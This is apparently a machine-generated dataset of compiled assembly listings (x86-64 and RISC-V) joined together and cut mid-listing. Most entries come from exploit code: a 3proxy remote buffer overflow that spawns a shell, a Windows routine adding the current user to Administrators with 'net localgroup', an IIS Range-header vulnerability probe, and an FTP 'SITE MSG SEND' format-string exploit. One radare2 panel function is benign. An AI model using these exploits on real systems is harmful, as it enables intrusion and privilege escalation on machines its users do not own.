printf@PLT movl 4+tbl(%rip), %esi leaq .LC5(%rip), %rdi xorl %eax, %eax call printf@PLT movl tbl(%rip), %esi movq 8+tbl(%rip), %rdi call proxy_connect@PLT movq 8+tbl(%rip), %rdi movl SPORT(%rip), %esi call getshell_conn@PLT movl %eax, %edi testl %eax, %eax jle .L11 call proc_shell@PLT .L11: xorl %edi, %edi call exit@PLT addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L16: .cfi_restore_state movq (%rbx), %rdi call usage@PLT movq 8+tbl(%rip), %rsi jmp .L10 .cfi_endproc .LFE0: .size main, .-main .globl tbl .bss .align 16 .type tbl, @object .size tbl, 16 tbl: .zero 16 .globl optarg .align 4 .type optarg, @object .size optarg, 4 optarg: .zero 4 .globl SPORT .align 4 .type SPORT, @object .size SPORT, 4 SPORT: .zero 4 .globl EOF .align 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .globl DFL_RETADDR .align 4 .type DFL_RETADDR, @object .size DFL_RETADDR, 4 DFL_RETADDR: .zero 4 .globl DFL_PORT .align 4 .type DFL_PORT, @object .size DFL_PORT, 4 DFL_PORT: .zero 4 .globl g_aug_volatile_4700 .data .align 4 .type g_aug_volatile_4700, @object .size g_aug_volatile_4700, 4 g_aug_volatile_4700: .long 9 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_3822.c_main_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n" .align 3 .LC1: .string "main(): allocating memory failed" .align 3 .LC2: .string "%x" .align 3 .LC3: .string "h:p:r:" .align 3 .LC4: .string "[*] target: %s:%d\n" .align 3 .LC5: .string "[*] return address($eip/\"CALL ESP\"): 0x%.8x\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-96 lw a5,.LANCHOR0 addiw a5,a5,1 sd s2,64(sp) mv s2,a0 lla a0,.LC0 sw a5,.LANCHOR0,a4 sd s0,80(sp) sd s1,72(sp) lla s0,.LANCHOR1 sd s3,56(sp) sd s4,48(sp) sd s5,40(sp) sd s6,32(sp) sd s7,24(sp) sd s8,16(sp) sd s9,8(sp) sd ra,88(sp) mv s1,a1 call puts@plt lw a4,16(s0) lw a5,20(s0) lla s3,.LC3 sw a4,0(s0) sw a5,4(s0) li s6,112 li s5,114 lla s8,.LANCHOR1+4 lla s7,.LC2 li s4,104 lla s9,.LC1 .L2: mv a2,s3 mv a1,s1 mv a0,s2 call getopt@plt lw a5,28(s0) beq a5,a0,.L14 .L9: beq a0,s6,.L3 beq a0,s5,.L4 beq a0,s4,.L15 ld a0,0(s1) call usage@plt mv a2,s3 mv a1,s1 mv a0,s2 call getopt@plt lw a5,28(s0) bne a5,a0,.L9 .L14: ld a1,8(s0) beq a1,zero,.L16 .L10: lw a2,0(s0) lla a0,.LC4 call printf@plt lw a1,4(s0) lla a0,.LC5 call printf@plt lw a1,0(s0) ld a0,8(s0) call proxy_connect@plt lw a1,32(s0) ld a0,8(s0) call getshell_conn@plt ble a0,zero,.L11 call proc_shell@plt .L11: li a0,0 call exit@plt ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) ld s8,16(sp) ld s9,8(sp) li a0,0 addi sp,sp,96 jr ra .L15: ld a5,8(s0) bne a5,zero,.L2 lw a0,24(s0) call strdup@plt sd a0,8(s0) bne a0,zero,.L2 li a1,1 mv a0,s9 call printe@plt j .L2 .L4: lw a0,24(s0) mv a2,s8 mv a1,s7 call sscanf@plt j .L2 .L3: lw a0,24(s0) call atoi@plt sw a0,0(s0) j .L2 .L16: ld a0,0(s1) call usage@plt ld a1,8(s0) j .L10 .size main, .-main .globl tbl .globl optarg .globl SPORT .globl EOF .globl DFL_RETADDR .globl DFL_PORT .globl g_aug_volatile_4700 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_4700, @object .size g_aug_volatile_4700, 4 g_aug_volatile_4700: .word 9 .bss .align 3 .set .LANCHOR1,. + 0 .type tbl, @object .size tbl, 16 tbl: .zero 16 .type DFL_PORT, @object .size DFL_PORT, 4 DFL_PORT: .zero 4 .type DFL_RETADDR, @object .size DFL_RETADDR, 4 DFL_RETADDR: .zero 4 .type optarg, @object .size optarg, 4 optarg: .zero 4 .type EOF, @object .size EOF, 4 EOF: .zero 4 .type SPORT, @object .size SPORT, 4 SPORT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_45401.c_AddAccountToAdminGroup_aug_v3_5
.file "extr_45401.c_AddAccountToAdminGroup_aug_v3_5.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "\n[-] Failed to obtain current username: %d\n\n" .align 8 .LC1: .string "\n[*] Adding current user '%s' account to the local administrators group" .align 8 .LC2: .string "net localgroup Administrators %s /add" .align 8 .LC3: .string "\n[-] Failed to execute command (%d) Run exploit again\n\n" .align 8 .LC4: .string "\n[+] Executed command successfully" .text .p2align 4 .globl AddAccountToAdminGroup .type AddAccountToAdminGroup, @function AddAccountToAdminGroup: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 movl %edi, %r12d pushq %rbx subq $136, %rsp .cfi_offset 3, -56 movq %fs:40, %rax movq %rax, -56(%rbp) xorl %eax, %eax movslq MAX_PATH(%rip), %rax movq %rsp, %rcx addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L14: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L14 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L15 .L4: leaq -172(%rbp), %rbx movl $4, %esi movq %rsp, %r14 movq %rbx, %rdi leaq -168(%rbp), %r15 leaq -160(%rbp), %r13 call ZeroMemory@PLT movl $4, %esi movq %r15, %rdi call ZeroMemory@PLT leaq -164(%rbp), %rsi movq %r13, %rdi movl $4, -172(%rbp) movl $100, -164(%rbp) call GetUserName@PLT testl %eax, %eax je .L16 movq %r13, %rsi leaq .LC1(%rip), %rdi xorl %eax, %eax call printf@PLT movq %rsp, %rdi movq %r13, %rdx leaq .LC2(%rip), %rsi call sprintf@PLT movl CREATE_NEW_CONSOLE(%rip), %eax xorl %r8d, %r8d xorl %ecx, %ecx subq $8, %rsp movl FALSE(%rip), %r9d movq %r14, %rdx xorl %esi, %esi pushq %r15 movl %r12d, %edi pushq %rbx pushq $0 pushq $0 pushq %rax call CreateProcessAsUser@PLT addq $48, %rsp testl %eax, %eax je .L17 leaq .LC4(%rip), %rdi call puts@PLT xorl %eax, %eax .L1: movq -56(%rbp), %rdx subq %fs:40, %rdx jne .L18 leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .p2align 4,,10 .p2align 3 .L15: .cfi_restore_state orq $0, -8(%rsp,%rdx) jmp .L4 .L16: call GetLastError@PLT leaq .LC0(%rip), %rdi movl %eax, %esi xorl %eax, %eax call printf@PLT movl $-1, %eax jmp .L1 .p2align 4,,10 .p2align 3 .L17: call GetLastError@PLT leaq .LC3(%rip), %rdi movl %eax, %esi xorl %eax, %eax call printf@PLT movl $-1, %eax jmp .L1 .L18: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size AddAccountToAdminGroup, .-AddAccountToAdminGroup .globl MAX_PATH .bss .align 4 .type MAX_PATH, @object .size MAX_PATH, 4 MAX_PATH: .zero 4 .globl FALSE .align 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .globl CREATE_NEW_CONSOLE .align 4 .type CREATE_NEW_CONSOLE, @object .size CREATE_NEW_CONSOLE, 4 CREATE_NEW_CONSOLE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_45401.c_AddAccountToAdminGroup_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\n[-] Failed to obtain current username: %d\n\n" .align 3 .LC1: .string "\n[*] Adding current user '%s' account to the local administrators group" .align 3 .LC2: .string "net localgroup Administrators %s /add" .align 3 .LC3: .string "\n[-] Failed to execute command (%d) Run exploit again\n\n" .align 3 .LC4: .string "\n[+] Executed command successfully" .text .align 1 .globl AddAccountToAdminGroup .type AddAccountToAdminGroup, @function AddAccountToAdminGroup: addi sp,sp,-240 sd ra,232(sp) sd s0,224(sp) sd s1,216(sp) addi s0,sp,240 sd s2,208(sp) sd s3,200(sp) sd s4,192(sp) sd s5,184(sp) sd s6,176(sp) sd s7,168(sp) lla s2,.LANCHOR0 lw a5,0(s2) addi s5,s0,-208 la s4,__stack_chk_guard addi a5,a5,15 andi a5,a5,-16 sub sp,sp,a5 li a1,4 ld a5, 0(s4) sd a5, -88(s0) li a5, 0 mv s1,a0 mv a0,s5 call ZeroMemory@plt addi s6,s0,-200 li a1,4 mv a0,s6 call ZeroMemory@plt li a5,4 addi s3,s0,-192 sw a5,-208(s0) addi a1,s0,-196 li a5,100 mv a0,s3 sw a5,-196(s0) call GetUserName@plt beq a0,zero,.L8 mv a1,s3 lla a0,.LC1 call printf@plt addi s7,sp,32 mv a2,s3 lla a1,.LC2 mv a0,s7 call sprintf@plt lw a6,4(s2) lw a5,8(s2) sd s6,16(sp) sd s5,8(sp) sd zero,0(sp) li a7,0 li a4,0 li a3,0 mv a2,s7 li a1,0 mv a0,s1 call CreateProcessAsUser@plt beq a0,zero,.L9 lla a0,.LC4 call puts@plt li a0,0 .L3: ld a4, -88(s0) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L10 addi sp,s0,-240 ld ra,232(sp) ld s0,224(sp) ld s1,216(sp) ld s2,208(sp) ld s3,200(sp) ld s4,192(sp) ld s5,184(sp) ld s6,176(sp) ld s7,168(sp) addi sp,sp,240 jr ra .L8: call GetLastError@plt mv a1,a0 lla a0,.LC0 call printf@plt li a0,-1 j .L3 .L9: call GetLastError@plt mv a1,a0 lla a0,.LC3 call printf@plt li a0,-1 j .L3 .L10: call __stack_chk_fail@plt .size AddAccountToAdminGroup, .-AddAccountToAdminGroup .globl MAX_PATH .globl FALSE .globl CREATE_NEW_CONSOLE .bss .align 2 .set .LANCHOR0,. + 0 .type MAX_PATH, @object .size MAX_PATH, 4 MAX_PATH: .zero 4 .type CREATE_NEW_CONSOLE, @object .size CREATE_NEW_CONSOLE, 4 CREATE_NEW_CONSOLE: .zero 4 .type FALSE, @object .size FALSE, 4 FALSE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_36773.c_main_aug_v3_5
.file "extr_36773.c_main_aug_v3_5.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\n Usage: %s <ip of server> \n" .LC1: .string "[*] Audit Started" .LC2: .string "Microsoft" .LC3: .string "[*] NOT IIS" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC4: .string "Requested Range Not Satisfiable" .section .rodata.str1.1 .LC5: .string "[!!] Looks VULN" .section .rodata.str1.8 .align 8 .LC6: .string "The request has an invalid header name" .section .rodata.str1.1 .LC7: .string "[*] Looks Patched" .section .rodata.str1.8 .align 8 .LC8: .string "[*] Unexpected response, cannot discern patch status" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 movq %rsi, %rbx subq $1176, %rsp .cfi_def_cfa_offset 1216 movdqa .LC9(%rip), %xmm0 movq %fs:40, %rax movq %rax, 1160(%rsp) movl g_aug_volatile_3804(%rip), %eax movb $0, 34(%rsp) movaps %xmm0, 16(%rsp) movdqa .LC10(%rip), %xmm0 movl $168626701, 112(%rsp) movaps %xmm0, 48(%rsp) movdqa .LC11(%rip), %xmm0 movb $0, 116(%rsp) movaps %xmm0, 64(%rsp) movdqa .LC12(%rip), %xmm0 addl $1, %eax movaps %xmm0, 80(%rsp) movdqa .LC13(%rip), %xmm0 movl %eax, g_aug_volatile_3804(%rip) movl $2573, %eax movw %ax, 32(%rsp) movaps %xmm0, 96(%rsp) cmpl $2, %edi je .L2 movq (%rsi), %rsi leaq .LC0(%rip), %rdi xorl %eax, %eax call printf@PLT movl $0, 12(%rsp) movl 12(%rsp), %eax cmpl $4, %eax jg .L3 .p2align 4,,10 .p2align 3 .L4: movl 12(%rsp), %eax addl $1, %eax movl %eax, 12(%rsp) movl 12(%rsp), %eax cmpl $4, %eax jle .L4 .L3: movl $1, %eax .L1: movq 1160(%rsp), %rdx subq %fs:40, %rdx jne .L14 addq $1176, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .L2: .cfi_restore_state leaq .LC1(%rip), %rdi leaq 16(%rsp), %rbp call puts@PLT movq 8(%rbx), %rdi call connect_to_server@PLT movq %rbp, %rdi movl %eax, %r12d call strlen@PLT movq %rbp, %rsi movl %r12d, %edi leaq 128(%rsp), %rbp movl %eax, %edx call write@PLT movq %rbp, %rsi movl %r12d, %edi movl $1023, %edx call read@PLT leaq .LC2(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L15 .L6: movq 8(%rbx), %rdi leaq 48(%rsp), %r13 call connect_to_server@PLT movq %r13, %rdi movl %eax, %r12d call strlen@PLT movq %r13, %rsi movl %r12d, %edi movl %eax, %edx call write@PLT movq %rbp, %rsi movl %r12d, %edi movl $1023, %edx call read@PLT leaq .LC4(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L7 leaq .LC5(%rip), %rdi call puts@PLT movl $1, %edi call exit@PLT xorl %eax, %eax jmp .L1 .L7: leaq .LC6(%rip), %rsi movq %rbp, %rdi call strstr@PLT testq %rax, %rax je .L9 leaq .LC7(%rip), %rdi xorl %eax, %eax call printf@PLT xorl %eax, %eax jmp .L1 .L15: leaq .LC3(%rip), %rdi call puts@PLT movl $1, %edi call exit@PLT jmp .L6 .L9: leaq .LC8(%rip), %rdi xorl %eax, %eax call printf@PLT xorl %eax, %eax jmp .L1 .L14: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl g_aug_volatile_3804 .data .align 4 .type g_aug_volatile_3804, @object .size g_aug_volatile_3804, 4 g_aug_volatile_3804: .long 1 .section .rodata.cst16,"aM",@progbits,16 .align 16 .LC9: .quad 6073139484287059271 .quad 724288090028331092 .align 16 .LC10: .quad 6073139484287059271 .quad 724289189539958868 .align 16 .LC11: .quad 8391085966155280200 .quad 7953728620040971893 .align 16 .LC12: .quad 7310601557483611495 .quad 3761693372623895923 .align 16 .LC13: .quad 3977583576072075062 .quad 3832904342842980656 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_36773.c_main_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC2: .string "\n Usage: %s <ip of server> \n" .align 3 .LC3: .string "[*] Audit Started" .align 3 .LC4: .string "Microsoft" .align 3 .LC5: .string "[*] NOT IIS" .align 3 .LC6: .string "Requested Range Not Satisfiable" .align 3 .LC7: .string "[!!] Looks VULN" .align 3 .LC8: .string "The request has an invalid header name" .align 3 .LC9: .string "[*] Looks Patched" .align 3 .LC10: .string "[*] Unexpected response, cannot discern patch status" .align 3 .LC1: .string "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" .align 3 .LC0: .string "GET / HTTP/1.0\r\n\r\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-1184 lla a5,.LC1 lla a4,.LC0 sd s1,1160(sp) la s1,__stack_chk_guard ld a3, 0(s1) sd a3, 1128(sp) li a3, 0 lhu t2,16(a4) lbu t0,18(a4) ld t6,0(a5) ld t5,8(a5) ld t4,16(a5) ld t3,24(a5) sd s0,1168(sp) sd s2,1152(sp) ld s0,8(a4) ld s2,0(a4) ld a7,40(a5) ld a6,48(a5) ld a2,56(a5) lw a3,64(a5) lbu a4,68(a5) ld t1,32(a5) lw a5,.LANCHOR0 addiw a5,a5,1 sd s3,1144(sp) sd s0,16(sp) sw a5,.LANCHOR0,s3 sd ra,1176(sp) sd s4,1136(sp) sd s2,8(sp) sh t2,24(sp) sb t0,26(sp) sd t6,32(sp) sd t5,40(sp) sd t4,48(sp) sd t3,56(sp) sd t1,64(sp) li a5,2 sd a7,72(sp) sd a6,80(sp) sd a2,88(sp) sw a3,96(sp) sb a4,100(sp) mv s0,a1 beq a0,a5,.L2 ld a1,0(a1) lla a0,.LC2 call printf@plt sw zero,4(sp) lw a4,4(sp) li a5,4 bgt a4,a5,.L3 li a4,4 .L4: lw a5,4(sp) addiw a5,a5,1 sw a5,4(sp) lw a5,4(sp) ble a5,a4,.L4 .L3: li a0,1 .L5: ld a4, 1128(sp) ld a5, 0(s1) xor a5, a4, a5 li a4, 0 bne a5,zero,.L14 ld ra,1176(sp) ld s0,1168(sp) ld s1,1160(sp) ld s2,1152(sp) ld s3,1144(sp) ld s4,1136(sp) addi sp,sp,1184 jr ra .L2: lla a0,.LC3 call puts@plt ld a0,8(s0) addi s4,sp,8 addi s2,sp,104 call connect_to_server@plt mv s3,a0 mv a0,s4 call strlen@plt mv a2,a0 mv a1,s4 mv a0,s3 call write@plt mv a1,s2 li a2,1023 mv a0,s3 call read@plt lla a1,.LC4 mv a0,s2 call strstr@plt beq a0,zero,.L15 .L6: ld a0,8(s0) addi s3,sp,32 call connect_to_server@plt mv s0,a0 mv a0,s3 call strlen@plt mv a2,a0 mv a1,s3 mv a0,s0 call write@plt mv a1,s2 li a2,1023 mv a0,s0 call read@plt lla a1,.LC6 mv a0,s2 call strstr@plt beq a0,zero,.L7 lla a0,.LC7 call puts@plt li a0,1 call exit@plt li a0,0 j .L5 .L7: lla a1,.LC8 mv a0,s2 call strstr@plt beq a0,zero,.L9 lla a0,.LC9 call printf@plt li a0,0 j .L5 .L15: lla a0,.LC5 call puts@plt li a0,1 call exit@plt j .L6 .L9: lla a0,.LC10 call printf@plt li a0,0 j .L5 .L14: call __stack_chk_fail@plt .size main, .-main .globl g_aug_volatile_3804 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_3804, @object .size g_aug_volatile_3804, 4 g_aug_volatile_3804: .word 1 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_cmd.c_cmd_panels_aug_v3_3
.file "extr_cmd.c_cmd_panels_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "Usage: v[*i]\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "v.test # save current layout with name test\n" .align 8 .LC2: .string "v test # load saved layout with name test\n" .align 8 .LC3: .string "vi ... # launch 'cfg.editor'\n" .section .rodata.str1.1 .LC4: .string "scr.layout" .LC5: .string "Cannot open file (%s)\n" .text .p2align 4 .type cmd_panels, @function cmd_panels: .LFB24: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 movq %rdi, %rbp subq $8, %rsp .cfi_def_cfa_offset 32 cmpq $0, 16(%rdi) jne .L3 movzbl (%rsi), %eax movq %rsi, %rdi cmpb $63, %al je .L17 cmpb $32, %al je .L18 cmpb $61, %al je .L19 cmpb $105, %al je .L20 movl 0(%rbp), %esi movq %rbp, %rdi call r_core_visual_panels_root@PLT .L3: addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 movl $1, %eax popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L18: .cfi_restore_state cmpq $0, 8(%rbp) leaq 1(%rsi), %r12 jne .L21 .L15: movl 4(%rbp), %edi movq %r12, %rdx leaq .LC4(%rip), %rsi call r_config_set@PLT addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 movl $1, %eax popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L20: .cfi_restore_state movl $32, %esi call strchr@PLT testq %rax, %rax je .L3 leaq 1(%rax), %r12 movq %rbp, %rdi xorl %edx, %edx movq %r12, %rsi call r_core_editor@PLT movq %rax, %rdi testq %rax, %rax je .L10 call free@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L17: leaq .LC0(%rip), %rdi xorl %eax, %eax call eprintf@PLT leaq .LC1(%rip), %rdi xorl %eax, %eax call eprintf@PLT leaq .LC2(%rip), %rdi xorl %eax, %eax call eprintf@PLT leaq .LC3(%rip), %rdi xorl %eax, %eax call eprintf@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L19: leaq 1(%rsi), %r12 movq %rbp, %rdi movq %r12, %rsi call r_save_panels_layout@PLT jmp .L15 .p2align 4,,10 .p2align 3 .L21: movq %r12, %rsi movq %rbp, %rdi call r_load_panels_layout@PLT jmp .L15 .p2align 4,,10 .p2align 3 .L10: movq %r12, %rsi leaq .LC5(%rip), %rdi xorl %eax, %eax call eprintf@PLT jmp .L3 .cfi_endproc .LFE24: .size cmd_panels, .-cmd_panels .globl g_aug_volatile_6468 .data .align 4 .type g_aug_volatile_6468, @object .size g_aug_volatile_6468, 4 g_aug_volatile_6468: .long 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_cmd.c_cmd_panels_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "Usage: v[*i]\n" .align 3 .LC1: .string "v.test # save current layout with name test\n" .align 3 .LC2: .string "v test # load saved layout with name test\n" .align 3 .LC3: .string "vi ... # launch 'cfg.editor'\n" .align 3 .LC4: .string "scr.layout" .align 3 .LC5: .string "Cannot open file (%s)\n" .text .align 1 .type cmd_panels, @function cmd_panels: ld a5,16(a0) bne a5,zero,.L18 addi sp,sp,-48 sd ra,40(sp) sd s0,32(sp) sd s1,24(sp) lbu a5,0(a1) li a4,63 mv a2,a1 beq a5,a4,.L23 li a4,32 mv s0,a0 beq a5,a4,.L24 li a4,61 beq a5,a4,.L25 li a4,105 beq a5,a4,.L26 lw a1,0(a0) call r_core_visual_panels_root@plt .L3: ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) li a0,1 addi sp,sp,48 jr ra .L18: li a0,1 ret .L24: ld a5,8(a0) addi a2,a1,1 bne a5,zero,.L27 .L21: lw a0,4(s0) lla a1,.LC4 call r_config_set@plt ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) li a0,1 addi sp,sp,48 jr ra .L26: li a1,32 mv a0,a2 call strchr@plt beq a0,zero,.L3 addi s1,a0,1 li a2,0 mv a1,s1 mv a0,s0 call r_core_editor@plt beq a0,zero,.L10 call free@plt j .L3 .L23: lla a0,.LC0 call eprintf@plt lla a0,.LC1 call eprintf@plt lla a0,.LC2 call eprintf@plt lla a0,.LC3 call eprintf@plt j .L3 .L25: addi s1,a1,1 mv a1,s1 call r_save_panels_layout@plt mv a2,s1 j .L21 .L27: mv a1,a2 sd a2,8(sp) call r_load_panels_layout@plt ld a2,8(sp) j .L21 .L10: mv a1,s1 lla a0,.LC5 call eprintf@plt j .L3 .size cmd_panels, .-cmd_panels .globl g_aug_volatile_6468 .data .align 2 .type g_aug_volatile_6468, @object .size g_aug_volatile_6468, 4 g_aug_volatile_6468: .word 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_372.c_sendexploit_aug_v3_8
.file "extr_372.c_sendexploit_aug_v3_8.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "%c%c%c%c%c%c%c%c%%%du%%18$hn%%%du%%19$hn" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "SITE MSG SEND %s %s%s\n" .section .rodata.str1.8 .align 8 .LC2: .string "[*] len: %d, sending code [%s]\n" .section .rodata.str1.1 .LC3: .string "_" .text .p2align 4 .globl sendexploit .type sendexploit, @function sendexploit: .LFB1: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $4096, %rsp .cfi_def_cfa_offset 4152 orq $0, (%rsp) subq $200, %rsp .cfi_def_cfa_offset 4352 movl %edi, 12(%rsp) movslq %edx, %rdx movq %rsi, %r15 movq %rcx, %rsi movq %fs:40, %rax movq %rax, 4280(%rsp) xorl %eax, %eax movq targets(%rip), %rax leaq (%rax,%rdx,8), %rcx movl (%rcx), %eax movl 4(%rcx), %ebx movl %eax, %edx movw %ax, 10(%rsp) leal 2(%rbx), %r12d shrl $16, %edx movzwl %dx, %ebp cmpw %ax, %dx ja .L2 movw %dx, 10(%rsp) movl %ebx, %ecx movzwl %ax, %ebp movl %r12d, %ebx movl %ecx, %r12d .L2: leaq 16(%rsp), %r14 testq %rsi, %rsi je .L3 movq %r14, %rdi call strcpy@PLT .L3: movq %r14, %rdi leaq .LC3(%rip), %r13 call strlen@PLT cmpl $31, %eax jle .L4 .L5: movq %r14, %rdi leaq 96(%rsp), %r13 call strlen@PLT subq $8, %rsp .cfi_def_cfa_offset 4360 movzbl %bh, %ecx movl %ebx, %r9d leal 16(%rax), %edx movzwl 18(%rsp), %eax movl %ecx, %r8d movzbl %bl, %ecx shrl $24, %ebx sarl $16, %r9d movl $68, %esi movq %r13, %rdi subl %edx, %eax movzbl %r9b, %r9d leaq .LC0(%rip), %rdx movzwl %ax, %eax subl %eax, %ebp subl $48, %ebp pushq %rbp .cfi_def_cfa_offset 4368 pushq %rax .cfi_def_cfa_offset 4376 movl %r12d, %eax shrl $24, %eax pushq %rax .cfi_def_cfa_offset 4384 movl %r12d, %eax sarl $16, %eax movzbl %al, %eax pushq %rax .cfi_def_cfa_offset 4392 movl %r12d, %eax movzbl %r12b, %r12d movzbl %ah, %eax pushq %rax .cfi_def_cfa_offset 4400 xorl %eax, %eax pushq %r12 .cfi_def_cfa_offset 4408 pushq %rbx .cfi_def_cfa_offset 4416 call snprintf@PLT addq $64, %rsp .cfi_def_cfa_offset 4352 movq %r13, %r9 movq %r14, %r8 leaq 176(%rsp), %rbp movq %r15, %rcx movl $4096, %esi xorl %eax, %eax leaq .LC1(%rip), %rdx movq %rbp, %rdi call snprintf@PLT movq %r14, %rdi call strlen@PLT movq %r13, %rdi movl %eax, %ebx call strlen@PLT movq %rbp, %rdx leaq .LC2(%rip), %rdi leal (%rbx,%rax), %esi call printf@PLT movq %rbp, %rdi call strlen@PLT movl 12(%rsp), %edi movq %rbp, %rsi movl %eax, %edx call write@PLT movq 4280(%rsp), %rdx subq %fs:40, %rdx jne .L16 addq $4296, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L4: .cfi_restore_state movq %r14, %rdi movq 